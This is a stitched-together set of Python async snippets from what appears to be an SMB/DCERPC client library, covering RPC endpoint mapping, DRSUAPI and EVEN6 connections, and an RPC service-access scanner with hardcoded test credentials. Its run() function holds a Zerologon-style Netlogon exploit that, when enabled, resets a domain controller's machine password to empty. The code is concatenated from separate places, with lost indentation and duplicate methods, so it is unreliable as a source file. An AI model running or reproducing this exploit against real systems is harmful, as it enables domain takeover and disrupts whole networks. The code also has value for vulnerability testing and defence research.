async def connect(self, open=False):
try:
epm = EPM(self.connection, protocol='ncacn_ip_tcp')
_, err = await epm.connect()
if err is not None:
raise err
stringBinding, _ = await rr(epm.map(drsuapi.MSRPC_UUID_DRSUAPI))
self.dce = epm.get_connection_from_stringbinding(stringBinding)
#the line below must be set!
self.dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
_, err = await self.dce.connect()
if err is not None:
raise err
if open == True:
_, err = await self.open()
if err is not None:
raise err
return True, None
except Exception as e:
return False, e
finally:
if epm is not None:
await epm.disconnect()
async def connect(self, open=True):
try:
epm = EPM(self.connection, protocol='ncacn_ip_tcp')
_, err = await epm.connect()
if err is not None:
return False, err
stringBinding, _ = await rr(epm.map(even6.MSRPC_UUID_EVEN6))
self.dce = epm.get_connection_from_stringbinding(stringBinding)
self.dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
_, err = await self.dce.connect()
if err is not None:
return False, err
_, err = await self.dce.bind(even6.MSRPC_UUID_EVEN6)
if err is not None:
return False, err
return True, None
except Exception as e:
return False, e
finally:
if epm is not None:
await epm.disconnect()
async def filereader_test(connection_string, filename, proxy=None):
cu = SMBConnectionURL(connection_string)
smb_connection = cu.get_connection()
epm = EPM(smb_connection, protocol='ncacn_ip_tcp')
await rr(epm.connect())
data, exc = await epm.map(drsuapi.MSRPC_UUID_DRSUAPI)
#data, exc = await epm.lookup()
if exc is not None:
raise exc
print(data)
async def connect(self, open=False):
epm = EPM(self.connection, protocol='ncacn_ip_tcp')
await rr(epm.connect())
stringBinding, _ = await rr(epm.map(drsuapi.MSRPC_UUID_DRSUAPI))
self.dce = epm.get_connection_from_stringbinding(stringBinding)
#the line below must be set!
self.dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
await rr(self.dce.connect())
if open == True:
await rr(self.open())
return True, None
async def from_smbconnection(connection:SMBConnection, auth_level = None, open:bool = True, perform_dummy:bool = False): """ Creates the connection to the service using an established SMBConnection. This connection will use the given SMBConnection as transport layer. """ try: if auth_level is None: #for SMB connection no extra auth needed auth_level = RPC_C_AUTHN_LEVEL_PKT_PRIVACY epm = EPM.from_smbconnection(connection) _, err = await epm.connect() if err is not None: raise err constring, err = await epm.map(Even6RPC().service_uuid) if err is not None: raise err target = DCERPCTarget.from_connection_string(constring, smb_connection = connection) dcerpc_auth = DCERPCAuth.from_smb_gssapi(connection.gssapi) rpc_connection = DCERPC5Connection(dcerpc_auth, target) service, err = await Even6RPC.from_rpcconnection(rpc_connection, auth_level=auth_level, open=open, perform_dummy = perform_dummy) if err is not None: raise err return service, None except Exception as e: return None, e finally: if epm is not None: await epm.disconnect()
async def run(dc_name, dc_ip, exploit=False):
#exploit = True
#dc_name = 'WIN2019AD'
dc_handle = '\\\\' + dc_name
#dc_ip = '10.10.10.2'
target_computer = dc_name #without $
plaintext = b'\x00' * 8
ciphertext = b'\x00' * 8
# Standard flags observed from a Windows 10 client (including AES), with only the sign/seal flag disabled.
flags = 0x212fffff
url = SMBConnectionURL('smb2+ntlm-password://XXX\\aaa:aaa@%s' %
dc_name) # dummy url to speed up the process..
connection = url.get_connection()
async with connection:
epm = EPM(connection, protocol='ncacn_ip_tcp')
_, err = await epm.connect()
if err is not None:
raise err
stringBinding, err = await epm.map(nrpc.MSRPC_UUID_NRPC)
_, err = await epm.connect()
if err is not None:
raise err
dce = epm.get_connection_from_stringbinding(stringBinding)
#dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
_, err = await dce.connect()
if err is not None:
raise err
_, err = await dce.bind(nrpc.MSRPC_UUID_NRPC)
if err is not None:
raise err
for _ in range(0, MAX_ATTEMPTS):
print('=====================================================')
_, err = await nrpc.hNetrServerReqChallenge(
dce, dc_handle + '\x00', target_computer + '\x00', plaintext)
if err is not None:
raise err
if exploit is False:
server_auth, err = await nrpc.hNetrServerAuthenticate3(
dce, dc_handle + '\x00', target_computer + '$\x00',
nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
target_computer + '\x00', ciphertext, flags)
else:
authenticator = nrpc.NETLOGON_AUTHENTICATOR()
authenticator['Credential'] = b'\x00' * 8
authenticator['Timestamp'] = 0
server_auth, err = await nrpc.hNetrServerPasswordSet2(
dce, dc_handle + '\x00', target_computer + '$\x00',
nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
target_computer + '\x00', authenticator, b'\x00' * 516)
if err is not None:
if err.get_error_code() == 0xc0000022:
continue
else:
raise err
if server_auth['ErrorCode'] == 0:
print('Server is vulnerable!')
break
else:
print('FAILED!')
await dce.disconnect()
async def amain():
try:
targets = []
ip = '10.10.10.2'
epm = EPM.from_address(ip)
_, err = await epm.connect()
if err is not None:
raise err
x, err = await epm.lookup()
if err is not None:
raise err
await epm.disconnect()
print(len(x))
#print(x)
for entry in x:
version = '%s.%s' % (entry['tower']['Floors'][0]['MajorVersion'],
entry['tower']['Floors'][0]['MinorVersion'])
uuidstr = bin_to_string(
entry['tower']['Floors'][0]['InterfaceUUID'])
service_uuid = uuidtup_to_bin((uuidstr, version))
#print(entry['tower']['Floors'][0]['InterfaceUUID'])
#print(version)
#print(service_uuid)
target, err = await EPM.create_target(ip, service_uuid)
print(err)
if err is not None:
if str(err).find('ept_s_not_registered') != -1:
continue
raise err
targets.append((uuidstr, service_uuid, target))
for uuidstr, service_uuid, target in targets:
#print('UUID: %s' % uuidstr)
#print('Target: %s' % target)
cred = SMBCredential(username='******',
domain='TEST',
secret='Passw0rd!1',
secret_type=SMBCredentialsSecretType.PASSWORD,
authentication_type=SMBAuthProtocol.NTLM,
settings=None,
target=None)
gssapi = AuthenticatorBuilder.to_spnego_cred(cred)
auth = DCERPCAuth.from_smb_gssapi(gssapi)
connection = DCERPC5Connection(auth, target)
connection.set_auth_level(RPC_C_AUTHN_LEVEL_CONNECT)
try:
_, err = await connection.connect()
if err is not None:
raise err
_, err = await connection.bind(service_uuid)
if err is not None:
raise err
req = DummyOp()
_, err = await connection.request(req)
if str(err).find('rpc_s_access_denied') == -1:
proto = 'UNK'
if uuidstr in KNOWN_PROTOCOLS:
proto = KNOWN_PROTOCOLS[uuidstr]
print('UUID : %s' % uuidstr)
print('proto: %s' % proto)
print('err : %s' % err)
print()
except Exception as e:
traceback.print_exc()
finally:
await connection.disconnect()
except Exception as e:
traceback.print_exc()